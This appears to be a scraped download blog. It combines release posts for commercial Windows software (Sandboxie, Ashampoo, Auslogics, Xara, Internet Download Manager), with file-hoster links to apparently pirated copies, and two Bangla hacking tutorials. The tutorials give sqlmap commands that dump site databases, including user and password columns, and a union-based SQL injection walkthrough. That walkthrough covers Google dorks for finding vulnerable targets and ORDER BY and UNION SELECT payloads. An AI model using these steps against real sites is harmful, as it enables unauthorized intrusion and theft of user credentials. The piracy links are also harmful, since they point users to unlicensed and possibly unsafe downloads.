SANDBOXIE 4.13.6 BETA

Sandboxie 4.13.6 Beta | 2.7 Mb

Sandboxie is a proprietary sandbox-based isolation program developed by Ronen Tzur, for 32-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying the local or mapped drive. An isolated virtual environment allows controlled testing of untrusted programs and web surfing.Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.
When you run a program on your computer, data flows from the hard disk to the program via read operations. The data is then processed and displayed, and finally flows back from the progam to the hard disk via write operations. Sandboxie changes the rules such that write operations do not make it back to your hard disk.
- Intercept changes to both your files and registry settings, making it virtually impossible for any software to reach outside the sandbox.
- Traps cached browser items into the sandbox as a by-product of normal operation, so when you throw away the sandbox, all the history records and other side-effects of your browsing disappear as well.

Benefits of the Isolated Sandbox:
- Secure Web Browsing: Running your Web browser under the protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox and can be discarded trivially.
- Enhanced Privacy: Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows.
- Secure E-mail: Viruses and other malicious software that might be hiding in your email can't break out of the sandbox and can't infect your real system.
- Windows Stays Lean: Prevent wear-and-tear in Windows by installing software into an isolated sandbox.

Translations: The following languages can be selected during installation: English, Albanian, Chinese (Simplified and Traditional), Czech, Finnish, French, German, Italian, Japanese, Korean, Polish, Portuguese (Brasil), Russian and Turkish.

www.sandboxie.com

                                                               Download Links

1. Uploaded
   
2. Rapidgator
   
3. Updown

Links are Interchangeable - No Password - Single Extraction

Read more

ASHAMPOO PHOTO COMMANDER V12.0.5 MULTILINGUAL

Ashampoo Photo Commander v12.0.5 Multilingual | 258 MB

Do you love photos? Your last vacation, your wedding - precious memories that mostly exist as photos make our photo collections grow ever larger. Originally kept in shoe boxes, today, photos are typically stored on computers. But do you exactly that very special photo from your last vacation is stored? Do you resent those tiny artefacts or blurriness in your photos that ruin otherwise perfect moments?
Enter Ashampoo Photo Commander 12, the ultimate in photo management. Effortlessly browse through large photo collections and remove annoying image defects on the fly. Optimize color and contrast settings and make your photos shine. Get creative and bring your photos to life with professional image effects and surprise your friends with self-made calendars, collages and greeting cards.

Next-gen photo management: More comfort, more power, more performance
• Easier to use
• Smart photo imports
• Faster image browsing with miniature views
• Enhanced file manager with cloud support
• New designs & gradients
• Enhanced wizards
• 1-Click object management & quick-access styles

Stay in control
100 or 100.000 photos, it makes no difference. Select between different view modes and find single photos in a flash thanks to powerful filters.

Eliminate chaos
Sorting, moving and renaming photos has never been easier. Organize your photo collection and rediscover hidden treasures.

Fix unlucky shots
Blurry vacation photos? Your birthday photos show faded colors or a lot of noise? Fix these issues fast and easily. Say no to red eyes and remove scratches.

Do magic with effects
Add a whiff of nostalgia to your childhood photos with Sepia or turn your garden into miniature scene. Combine effects for unlimited possibilities.

Make your photos into something beautiful
Design slideshows, calendars or high-quality collages. Create stunning panorama pictures or surprise your friends with self-made greeting cards.

Also for professionals
With tonal corrections, gradation curves and RAW support, Ashampoo Photo Commander 12 is ideal for professional use.

All Link Download:

1. http://uploaded.net/file/d5mhewi6/ASH_Phot0_Commander_12.0.5.part1.rar
   
2. http://uploaded.net/file/28azfkdf/ASH_Phot0_Commander_12.0.5.part2.rar
   
3. http://uploaded.net/file/f4i4humi/ASH_Phot0_Commander_12.0.5.part3.rar
   
4. http://rapidgator.net/file/25caf46b0b2f8e209856406fddfd436d/ASH_Phot0_Commander_12.0.5.part1.rar.html
   
5. http://rapidgator.net/file/00addb01a39511c4f89c614e9897ae19/ASH_Phot0_Commander_12.0.5.part2.rar.html
   
6. http://rapidgator.net/file/88c5db38e1a09d3011f79a7aef2db2b9/ASH_Phot0_Commander_12.0.5.part3.rar.html

Read more

AUSLOGICS BOOSTSPEED PREMIUM V7.3.2.0 (PORTABLE)

Auslogics Boostspeed Premium v7.3.2.0 (Portable) | 18 MB

AusLogics BoostSpeed - the ideal solution to keep your PC running faster, cleaner and error-free. This powerful optimization suite will boost Internet connections, tweak Windows to its peak performance, clean registry and block annoying ads. It's a great way to keep your computer clean and optimized.
Speed Up PC With BoostSpeed
Modify Windows settings, file system and services to greatly increase system performance. Increase startup and shutdown speed, disable annoying CD autorun and error reporting features. BoostSpeed will keep monitoring your system for possible optimizations and let you know if such optimizations are possible. You can also run the System Optimization Wizard to periodically optimize your PC.

Speed Up Internet
Adjust your PC for faster images, music and software downloads, increased browsing speed and reliable Internet connections. View your download speed and graphs. To gain additional performance boost you can also turn on DNS Optimization.

Block Banner Advertisements
Tired of annoying banner advertisements accompanying many web sites? Now you can eliminate advertisements and also speed up your Internet browsing with BoostSpeed Banner Killer! You can add your own web sites to the black list to block them from showing their advertisements.

Keep Disk and Registry Clean
Get rid of junk on the disks and registry of your PC. Remove hazardous and space-wasting files left by untidy programs and crashes of your system. Dramatically increase the performance of your PC by cleaning, optimizing and defragmenting local disks and registry.

Optimize Memory and Appearance
Badly written applications constantly steal memory without giving it back. That's why your PC becomes unstable with time and you have to reboot. BoostSpeed automatically frees up computer memory to gain additional performance boost. You can also manually recover memory and clipboard.

Keep your PC fast and safe
BoostSpeed will detect most of the popular "PC-slowers" - bundle-software (such as eDonkey or Kazaa) which silently download malware and spyware to your computer, taking up internet traffic and slowing down the system. This will also keep your system safe from prying eyes of spyware programs.

Boost Software Products
BoostSpeed can improve performance of different software products, including Microsoft Office, Internet browsers (such as Internet Explorer, Opera, Mozzila), E-mail clients (Outlook, The Bat), MSN Messenger, ICQ, Media Player and others.

System Optimization Tools
Greatly increase your PC startup speed with Autorun Manager, where you can disable or remove the programs which try to load up when Windows starts up. Force-uninstall unwanted software products which take up space on your computer and slow it down.

Networks Tools
Keep your connection alive while you're away, synchronize your computer clock with atomic clock over the Internet, lookup domain names and IP addresses, measure your Internet connection speed. Troubleshoot and improve your Internet connection and local network with an excellent selection of network management tools.
OS : Windows XP, Vista, 7, 8.1
Language : English

All Link Download:

• Link Not Found
  
• http://uploaded.net/file/ory1pc1s/Auslogics.BoostSpeed.Premium.7.3.2.0.Portable.rar
  
• http://rapidgator.net/file/6b6a63ddc822e242d34edb0a351b8980/Auslogics.BoostSpeed.Premium.7.3.2.0.Portable.rar.html

Read more

XARA WEB DESIGNER PREMIUM V10.1.3.35257 (X86/X64)

Xara Web Designer Premium v10.1.3.35257 (x86/x64) | 161 MB

Xara Web Designer is unlike any web editor you will have seen before; an easy template based solution that gives you total page design freedom, no HTML skills required. Traditional web authoring tools are really just HTML editors, they are designed to create text layout, providing few, if any, graphical capabilities.
And yet it's evident that the vast majority of modern websites are of a graphical nature. We believe you should have complete freedom to include anything - text, graphics, photos - anywhere on the page, using just one tool. And you shouldn't need to know, or even see, the HTML that goes into creating your site, any more than a car driver needs to know how an engine works.



Web Designer gives you total design freedom - using drag and drop you can literally place anything, anywhere on the page. And things which are normally difficult to achieve in HTML are a snap in Web Designer - for example text with curved edges, text or graphics at an angle, text flowing around objects - no problem! Whether you customize one of the bundled templates or create your own graphics or animations, it's genuinely WYSIWYG - what you see in Web Designer is exactly what you get on your website.

Some features:
» Liquid text flow around objects
» Easy mouseover, thumbnail and pop-up creation
» Automatic adjustment of photos to the correct web resolution
» One-click change of site wide theme colors and shades
» Automatic color matching of imported objects such as buttons
» Buttons and text panels that automatically stretch as you change the text



Web Authoring & Publishing

Responsive Web Design
With the surge in popularity of browsing on mobiles and tablets it is becoming essential to create sites that are tailored to the needs of these visitors. Until now the solution has involved creating multiple sites and a good understanding of javascript. Web Designer 10 introduces a RWD solution that allows you to create a single file containing variants of your site at different widths, so that you website responds dynamically to the screen size of the viewer, presenting the design most appropriate to their device. And as you'd expect from Web Designer you won't need to do any coding whatsoever!

Put simply you can create multiple variants - eg desktop, tablet, phone - with shared content (eg text, photos, graphics) but with the ability to freely customize the layout of the variants to suit the target device size. The layout of the variants is entirely in your control, ensuring a quality result for mobiles and tablets. Web Designer export s a single HTML file that can dynamically change from one layout to another depending on the screen size of the viewer.

New Page Transitions
V10 offers significantly improved page transition effects including 3D effects, which are hardware accelerated, super-smooth and completely flicker free. They're ideal for presentations, but can also be used with great effect for Supersites.

Scale To Fit
Instead of designing presentation websites for specific screen sizes, the pages will now intelligently and automatically scale to fit any browser size (or you can set them to full-screen). Nb you can use this for websites too, it could be a good option if, like presentations, they are relatively small sites with short pages (might be good with a Supersite for example, so each page would automatically resize to fit the browser window).

Password Protected MAGIX Online World Pages
If you publish your website via MAGIX Online World (free MOW hosting is included in all copies of Web Designer), you can now easily password protect that website. Includes full facilities for managing your authorization list.

Font Awesome Symbols (Added August 2014)
A quick & easy way to insert symbols from the large and growing Font Awesome selection. The full set is displayed via the Insert menu, simply browse and click on the symbol you require to insert it in your document as a text character or graphic.

Single Page Supersites
If you have a small or very focused site and you're struggling to make it stand out from the crowd, you're going to love our new concept of souped-up single page sites!

Instead of your website being presented as separate web pages in the traditional way - where you have to click a link to navigate from one page to another - you now have the option to present the whole website as one single, fast scrolling (horizontal or vertical) document using scroll or swipe to navigate. Or you can present pages one at a time in the traditional way, but with our new super-slick animated page transitions (see below), triggered by scroll or swipe gestures or clicks.

The possibilities are endless but examples include event promos, portfolios, teasers for new products, fundraisers, short tutorials or CVs. It's great for simple single product sites (a font, a template, a car for sale...) and it might be a more eye catching and interactive option than a PDF document (see our menu example). Whatever your application it's ideally suited to the many users who now browse on tablets (whilst being completely backwards compatible with normal browsers).

SmartShapes
An amazingly quick and easy way to create and edit some of the most commonly required shapes - for example speech bubbles, fancy arrows and text panels - with top quality results guaranteed. If you don't have the time (or skill) to master the drawing tools you'll no longer need to resort to clipart. Here are some examples from the Smart Shapes library (internet delivered, so more shapes will be added thru the rest of this year) that can be easily customized.

Insert Menu
A new top level Insert menu which considerably improves the ease with which you can insert key elements into your document (eg insert new page or insert page number) including some new options eg 'insert picture from Camera'.

MAGIX Online World 'M' hosting included free
Owners of Web Designer Premium get MAGIX Online World 'M' hosting option included free for one year (worth $1.99 a month). This includes 2GBytes of free web hosting space, one free domain name (e.g. yourname.com or .co.uk or .de etc) and a free web-based email that can be associated with that domain name (5 different mailboxes). Owners of Premium V9 will get a coupon that allows them to extend their free M hosting package for another year.

Content

Content Catalog
An online extension of the Designs Gallery offering greatly improved browsing of content, within a resizeable window - especially valuable for web themes.

New Templates
11 brand new contemporary General Website Themes (normally sold in Web Packs for $10 each, so that's $110 worth!) with up to 16 page layouts, all including new mobile variants.

New Widgets
3 new photo slider widgets
New social media widgets: Instagram badge, Instagram SnapWidgets (embed your Instagram photos into a website as a photo gallery), Pinterest and LinkedIn badges

Other Minor Enhancements

Auto-Rotate of Photos on Import
You might have recently noticed that that your photos were being randomly rotated when you imported them from some modern devices. Where necessary Web Designer now does an auto detect and rotate to fix this issue.

Creating Online Presentations
The new page transitions are a great enhancement for presentations, but there are also a few other minor useability enhancements in the process of creating and viewing steps, plus two new aspect ratio 'empty' templates (16x10 widescreen and 4:3 traditional screen).

Improved Microsoft Word and PDF Import
Word import has been enhanced. The PDF import filter has been replaced with a new one which should already be showing improved results.

All Link Download:

http://uploaded.net/file/n7qzlcsi/xarawebpr10566213.part1.rar
http://uploaded.net/file/fkm4asut/xarawebpr10566213.part2.rar
http://rapidgator.net/file/f2ef1a846fbb059e53dc5fc440d1c48f/xarawebpr10566213.part1.rar.html
http://rapidgator.net/file/6f9fe234cddc65d68ccc07040a060392/xarawebpr10566213.part2.rar.html

Read more

INTERNET DOWNLOAD MANAGER 6.21 BUILD 14 MULTILINGUAL

Internet Download Manager 6.21 Build 14 Multilingual | 12.3 MB
Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download accelerators and managers that segment files before downloading starts, Internet Download Manager segments downloaded files dynamically during download process.

Internet Download Manager reuses available connections without additional connect and login stages to achieve better acceleration performance. Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.

Main Features:
* All popular browsers and applications are supported! Internet Download Manager has been tested with the following browsers: Internet Explorer, MSN Explorer, AOL, Netscape Communicator, Netscape 6, Netscape 7, Mozilla, Mozilla Firefox, Mozilla Firebird, Opera, NetCaptor, UltraBrowser, Slim Browser, Avant Browser, MyIE2, Optimal Desktop, Ace Explorer, Advanced Browser, 27 Tools-in-1 Wichio Browser, WindowSurfer, 550 Access Browser, FineBrowser Freeware, Kopassa Browser, Fast Browser Pro, Enigma Browser, GoSuRF, K-Meleon, Smart Explorer, The Off By One Web Browser, Smartalec Voyager, CrystalPort AppCapture, The Family Browser, XANA Web Browser, Bluto, AutoSurf, 32bit Web Browser, BrowseMan, WrestlingBrowser, Eminem Browser, UltraBrowser, Cygsoft LDAP Browser, and Net M@nager. Internet Download Manager supports all versions of popular browsers, and can be integrated into any 3rd party Internet applications.
* Easy downloading with one click. When you click on a in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP, HTTPS and MMS protocols.
* Download Speed Acceleration. Internet Download Manager can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.
* Download Resume. Internet Download Manager will resume unfinished download from the place where they left off.
* YouTube grabber. Internet Download Manager can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video.
* Simple installation wizard. Quick and easy installation program will make necessary settings for you, and check your connection at the end to ensure trouble free installation of Internet Download Manager
* Drag and Drop. You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager.
* Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.
* Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application. None of download managers have this feature.
* Built-in Scheduler. Internet Download Manager can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it's done.
* IDM includes web site spider and grabber. IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It's possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes.
* IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers.
* IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password.
* Download All feature. IDM can add all downloads linked to the current page. It's easy to download multiple files with this feature.
* Customizable Interface. You may choose the order, and what buttons and columns appear on the main IDM window.
* Download Categories. Internet Download Manager can be used to organize downloads automatically using defined download categories.
* Quick Update Feature. Quick update may check for new versions of IDM and update IDM once per week.
* Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.
* IDM is multilingual. IDM is translated to Albanian, Arabic, Azerbaijan, Bosnian, Bulgarian, Chinese, Croatian, Czech, Danish, Dutch, Farsi, French, German, Greek, Hebrew, Hungarian, Italian, Japanese, Korean, Lithuanian, Macedonian, Norwegian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, Thai, Turkish, and Uzbek languages.

OS : Windows XP, Vista, 7, 8 (32-bit / 64-bit)
Language : Multilingual

Home Page -

http://www.internetdownloadmanager.com/

Buy Premium From My Links To Get Resumable Support,Max Speed & Support Me

Download ( Uploadable )
http://www.uploadable.ch/file/kPW4jPaGbfT2/4akk1.Internet.Download.Manager.6.21.Build.14.rar

Download ( Uploaded )
http://uploaded.net/file/szvumhwn/4akk1.Internet.Download.Manager.6.21.Build.14.rar

Download ( Rapidgator )
http://rapidgator.net/file/0f81060c4e2023230ccdc3a02c973b00/4akk1.Internet.Download.Manager.6.21.Build.14.rar.html

Download ( Oboom )
https://www.oboom.com/8E67MH0L/4akk1.Internet.Download.Manager.6.21.Build.14.rar

Download( Updown )
https://updown.bz/gsK03F5f5R/4akk1.Internet.Download.Manager.6.21.Build.14.rar

If You Got Any Problem With Links ... Just PM US (Click Here)

We Recommend You to Purchase Premium Account To Download Unlimited For All Month With Ultra Fast Speed. CLICK HERE

Read more

How to use SQLMap In Kali Linux In Bangla

কিভাবে sqlmap ব্যাবহার করবেন কালি লিনাক্সে। (explained)

লেখকঃ সাইবার ওয়ার্ম
প্রথমে একটি sqlinjection ভুলনরাবল সাইট বের করুন।
আবার কালি লিনাক্সের টারমিনাল চালু করুন।
এরপর টার্মিনালে টাইপ করুন।

python sqlmap.py -u "vulnerablesite.com/index.php?id=1" --dbs

এখানে vulnerablesite.com/index.php?id=1 এর জায়গায় আপনার বের করা
sql injection ভুলনারাবল সাইট টি দিবেন।
এবং "" এই দুইটি চিহ্ন দিতে কিন্তু ভুলবেন না।
এরপর sqlmap কাজ শূরু করে দিবে।
এখানে python কমান্ড টি ব্যাবহার করা হয়েছে কারণ sqlmap টুল টি python দিয়ে তৈরি করা
এবং sqlmap.py কমান্ডটি দিয়ে সফটওয়্যার টি ওপেন করা হয়েছে।
আর -u কমান্ডটি দ্বারা url বোঝানো হয়েছে। এবং --dbs কমান্ড টি দ্বারা Database বোঝানো হয়েছে।
এই কমান্ড টি দিলে sqlmap ভুলনরাবল সাইটের ডাটাবেস বের করা শুরু করবে।
এখানে sqlmap করা অবস্থায় হয়তো আপনাকে জিজ্ঞাসা করবে।
আপনি যেই সাইটটি তে sqlmap করতে চাচ্ছেন সেই সাইটটি mysql দিয়ে তৈরি আপনি কি চান অন্য ডাটাবেসের
জন্যে এই স্ক্যানটি বন্ধ করতে??
আপনি যদি y দেন তাহলে sqlmap শুধু mysql ডাটাবেসের নিয়মে sql inject করার চেষ্টা করবে।
আর আপনি যদি n দেন তবে অন্য সব ডাটাবেস এর জন্যেও sql টেস্ট করবে।
তবে এই ক্ষেত্রে y দেওয়ায় ভালো কারণ sqlmap টুলস টি নিজে শিউর হয়ে তারপর আপনাকে জিজ্ঞাসা করে যে
শুধুমাত্র mysql ডাটাবেসের জন্যে স্ক্যানটি সীমাবদ্ধ রাখবে নাকি
যায়হোক আবার আপনাকে প্রশ্ন করবে আপনি কি সব ধরনের sql injection টেস্ট করতে চান।
নাকি প্রচলিত এবং জনপ্রিয় পদ্ধতি গুলার মাধ্যমে sql injection করতে চান।
এখন আপনি যদি সব ধরনের টেস্ট করাতে চান তাহলে হয়তো সময় বেশি লাগবে।
কিন্তু প্রচলিত sql injection টেস্ট গুলো করাতে গেলে সময় কম লাগবে।
তবে আমি পরামর্শ দিবো সব ধরনের sql injection টেস্ট করানোর জন্যে।
এতে সময় বেশি লাগলেও এটা কার্যকরী।
যায়হোক এরপর যদি সাইটটি sql inject করা যায় তাহলে sqlmap আপনাকে জিজ্ঞাসা করবে যে
সাইট টি ভুলনারবল আপনি কি স্ক্যান চালু রাখতে চান।
আপনি y প্রেস করে এন্টার দিন।
যায় হোক কিছুক্ষন পরে আপনাকে ভুলনারবল সাইটের ডাটাবেস দেখাবে।
সাধারনত একটি সাইটি দুইটি ডাটাবেস থাকে একটি হচ্ছে information_schema
আরেকটি হচ্ছে sitedatabase (সাইটের এডমিন যে নামে ডাটাবেস টা বানায় সে নাম)
এখন আমাদের কাজ হবে sitedatabase নিয়ে।
এখন আমরা সাইটের ডাটাবেস থেকে টেবিলস বের করবো
যার জন্যে টাইপ করুন।

python sqlmap.py -u "vulnerablesite.com/index.php?id=1" -D "sitedatabase" --tables

এখানে -D কমান্ড দ্বারা সিলেক্টেড ডাটাবেস কে বোঝানো হয়েছে এবং এবং --tables কমান্ড দ্বারা ডাটাবেস থেকে টেবিলস গুলো ডাম্প বা ডাউনলোড করতে বলা হয়েছে।
এখন আপনি ডাটাবেসের টেবিলস গুলো লিস্ট আকারে দেখতে পাবেন।
সব ডাটাবেসের টেবিলস গুলো এক রকম হয় না।
কিন্তু নাম দেখলেয় বুঝতে পারবেন কোন টেবিলস এ কি কি ধরনের ইনফরমেশন থাকতে পারে।
যায় হোক মনে করেন আপনি টেবিলস নাম পেলেন ১০টা তার মধ্যে একটা টেবিলের নাম হলো users তার মানে বোঝা গেলো যে এটা
তে সাইটের ইউজার দের তথ্য থাকবে এখন আমরা এই টেবিল টা থেকে user টেবিল থেকে কলাম ডাম্প করবো।
তার জন্যে কমান্ডঃ

python sqlmap.py -u "vulnerablesite.com/index.php?id=1" -D "

sitedatabase" -T "users" --columns
এখানে -T ব্যাবহার করা হয়েছে নির্ধারিত টেবিল নাম সিলেক্ট করার জন্যে মানে users টেবিল নাম টি সিলেক্ট করার জন্যে।
এবং --columns কমান্ড টি ব্যাবহার করা হয়েছে কলাম বের করার জন্যে।
এখন আপনি দেখতে পাবেন লিস্ট আকারে কলাম নাম
সেখানে হয়তো থাকতে পারে।
username
password
mail
এরকম ধরনেই কিছু কলাম এখন আমরা এই কলাম গুলো থেকে ডাটা ডাম্প করবো এবং তার জন্যে কমান্ড।

python sqlmap.py -u "vulnerablesite.com/index.php?id=1" -D "

sitedatabase" -T "users" -C "username" --dump
প্রথমে আমরা ইউজার নেম কলাম থেকে ডাটা ডাম্প করলাম
এখানে -C দ্বারা কলাম বোঝানো হয়েছে এবং --dump দ্বারা ডাটা টাকে ডাটাবেস থেকে ডাম্প বা ডাউনলোড করা বোঝানো হয়েছে।
এখন একই ভাবে আমরা password কলাম টি ডাম্প করবো
আশা করি ভালো করে আপনি বুঝতে পেরেছেন
কোনো সমস্যা হলে কমেন্টে যানান
ধন্যবাদ

Read more

Sql Injection Union Based In Bangla

SQL INJECTION (১ম অংশ)
সবাই আশা করি ভালো আছেন।

(বিশেষ দ্রষ্টব্যঃটিউটোরিয়ালে আমি একটি কাল্পনিক (যে সাইটের কোনো অস্তিত্ব নেই) সাইট কে উদাহারণ হিসাবে ধরে নিয়ে আপনাদের দেখানোর চেষ্টা করেছি।)
আপনি যদি কোনো সাইট Sql injection করতে যান তবে এই টিউটোরিয়ালের সাথে অনেক অমিল থাকতে পারে,তবে
কমান্ড গুলো সব একই হবে।)
এখন থেকে আমি SQL INJECTION নিয়ে নিয়মিত পোস্ট লেখার চেষ্টা করবো।
আজকে আমি আপনাদের সাথে বেসিক ইউনিয়ন বেজড SQL INJECTION
কিভাবে করা হয় সেটা দেখাবো।
এবং বিস্তারিত আলোচনা করার চেষ্টা করবো আশা করি ধৈর্য সহকারে পড়বেন।

• SQL INJECTION কি?

SQL INJECTION  হচ্ছে বর্তমান সময়ের ওয়েবসাইট হ্যাকিং সবচেয়ে জনপ্রিয় এবং
কমন মেথড/পদ্ধতি।
আসলে SQL INJECTION হচ্ছে তেমন কঠিন জিনিস না তবে
এটা ভালোভাবে শিখতে হলে,
এটার পিছনে আপনার অনেক সময় দেওয়া লাগবে।
কিন্তু হ্যাকিং এ নতুন এমন  অনেক Newbiee হ্যাকার মনে করে যে SQL INJECTION কোনো বড ব্যাপার নাহ
কারণ তারা খুব সহজেই বিভিন্ন টুলস(Havij,Sqlmap,Sqlninja) ইত্যাদি ব্যাবহার করে SQL INJECTION  করতে পারে।
কিন্তু SQL INJECTION  এমন একটা জিনিস যেটা সম্পর্কে আপনার সম্পূর্ণ শিখতে হলে অনেক বই শেষ করা লাগবে :)
এর মানে বোঝা গেলো যে শুধুমাত্র টুলস ব্যাবহার করে আপনি অনেক সাইট কিন্তু SQL INJECTION করতে পারবেন।
কিন্তু তার দ্বারা আসলেই কোনো লাভ হবে না।
কারণ আপনি কিছুই শিখতে পারবেন না।
এবং অনেক সময় টুলস দিয়েও SQL INJECTION এর জন্যে দুর্বল/ভুলনারেবল সাইট হ্যাক করতে পারবেন না।
যায় হোক।

• SQL INJECTION দ্বারা কি কি করতে পারবেন আপনি?

1. আপনি ডাটাবেসে তথ্য তে এক্সেস নিতে পারবেন।
2. আপনি ডাটাবেসের তথ্য মোডিফাই করতে পারবেন।
3. আপনি সাইটের লগইন এরিয়া বাইপাস করতে পারবেন।
4. আপনি SQL Server হ্যাক করতে পারবেন।

তাহলে শুরু করা যাক।
প্রথমত আমাদের SQL INJECTION এর জন্যে ভুলনারবল সাইট বের করতে হবে।
যদি আপনি হ্যাকার হন,তাহলে আপনি ভালো করেই জানবেন যে সার্চ ইঞ্জিন হলো হ্যাকারদের
সবচেয়ে বেস্ট ফ্রেন্ড।আমরা SQL INJECTION ভুলনারবল সাইট GOOGLE Dork
ব্যাবহার করে বের করতে পারবো।
নিচে আমি কিছু কমন SQL INJECTION Dork দিচ্ছিঃ

inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

Dork আরো অনেক বড বিশাল লিস্ট আছে। পরে কোনো এক সময় শেয়ার করবো।
অথবা আপনি গুগল থেকে সার্চ করে বের করে নিতে পারেন।
এখন আপনি এখান থেকে যেকোনো একটি Dork নিয়ে গুগলে সার্চ দিলে
রেসাল্টে অনেক সাইট দেখতে পাবেন।
সেখান থেকে যেকোনো একটি সাইটে প্রবেশ করুন।
মনে করুন এরকম একটি সাইট পেলেন আপনি (উদাহারণ)

website.com/index.php?id=1

এই ইউআরএল টি অনেক রকমের হতে পারে। তবে আমি উদাহারণের জন্যে এটি দেখালাম।
এখন আমরা টেস্ট করবো সাইটটি SQL INJECTION ভুলনরাবল কিনা।
তার জন্যে আমি সাইটের শেষে এই (') চিহ্নটি দিবো (ব্রাকেটের মাঝখানের চিহ্নটি)
উদাহারণঃ

website.com/index.php?id=1'

এখন যদি সাইটি SQL INJECTION এর জন্যে ভুলনারবল হয় তাহলে
আপনি এরকম কিছু এরর দেখতে পাবেন।

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
অথবা,
Warning: mysql_fetch_array()

অথবা আপনি যদি কোনো রকমের mysql এরর দেখতে পান।
অথবা যদি সেই ওয়েব পেইজ থেকে কোনো ডাটা মিস করে তাহলে বুঝতে হবে
সাইটটি SQL INJECTION ভুলনরাবল।
যদি এসবের কিছু না হয় তাহলে সাইটটি ভুলনারবল নাহ!
অন্য আরেকটি সাইট খুজুন।
এরর পাওয়ার পরে এখন আমাদের কাজ হবে সাইটটি কি এক্সপ্লইটিং করার ।
মানে SQL INJECTION করতে হবে।
আমরা এতক্ষন ভুলনারবল সাইট বের করলাম,এখন আমাদের কাজ হবে সাইটটি থেকে ডাটা
ডাম্প করা বা হ্যাক করা।
এখন আমাদের পরবর্তী পদক্ষেপ হবে এই ডাটাবেসের টেবিলে কলামের সংখ্যা কতো সেটা বের করা।
সেজন্যে আমরা ' চিহ্ন টি order by statement এ পরিবর্তন করবো।
উদাহারণঃ

website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--

আমাদের order by এর নাম্বার টি বাডিয়ে যেতে হবে যতক্ষন না আমরা
সাইটটি তে কোনো এরর দেখতে না পায়।
এরর অনেকটা এরকম হতে পারে,
unknown column numbers
অথবা
সাইটের কিছু ডাটা মিস হতে পারে।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=20 order by 1-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 2-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 3-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 10-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 20-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 21-- ERROR সাইটের কনটেন্ট মিস হচ্ছে।

এখন আমারা order by 21 পর্যন্ত আসার পর error দেখতে পেলাম।
কিন্তু order by 20 দিলে কোনো এরর নেই।
তার মানে ডাটাবেসে ২০ টি কলাম আছে।
অনেক সময় order by 1000 দিলেও এরর আসে নাহ।
সে ক্ষেত্রে id / parameter এর শেষে ' চিহ্ন টি দিতে হয়
এবং শেষে একটি + যোগ করতে হয়।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=20' order by 21--+

এখন আমাদের জানা আছে যে এই ডাটাবেসে ২০টি কলাম আছে।
এখন আমাদের কাজ হবে সব কলাম সিলেক্ট করা union select statement ব্যাবহার করে।
select statement টি Data দেখার জন্যে ব্যাবহার করা হয়।
যায় হোক এর পর্যায়ে আমরা এই কোডটি ব্যাবহার করবো।

http://www.exaplme.sqlsite.com/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

এখন আমরা ওয়েব পেইজে কিছু নাম্বার দেখতে পাবো।
নম্বর গুলো ১-২০ এর মধ্যে হবে কারণ আমরা জানি এই সাইটের কলাম ২০ টি।
আর আমরা যে কমান্ডটি ব্যাবহার করেছি সেটা দিয়ে ২০টি কলামের মধ্যে কোনটি
String কলাম সেটা বের করার জন্যে এই কমান্ড টি ব্যাবহার করেছি।
যদি আপনি কোনো নাম্বার দেখতে না পান তাহলে
parameter value এর আগে একটি - চিহ্ন দেন।
উদাহারণঃ

http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

আপনি ওয়েবপেইজে কিছু নাম্বার দেখতে পাবেন।
আমি ৩,৪ দেখতে পেলাম।
এই দুইটা হলো String Column আমরা ডাটাবেস থেকে তথ্য হ্যাক করতে পারবো
এই দুইটি কলাম ব্যাবহার করে।
অনেক সময় উপরে যে কমান্ডটি নিয়ে লেখেছি সেটা কাজ করে নাহ :(
সে ক্ষেত্রে আমরা এরর দেখতে পাবো।
এই ক্ষেত্রে waf bypass করতে হবে।
সেটা সম্পর্কে সামনের টিউটোরিয়াল গুলোতে আলোচনা করবো।
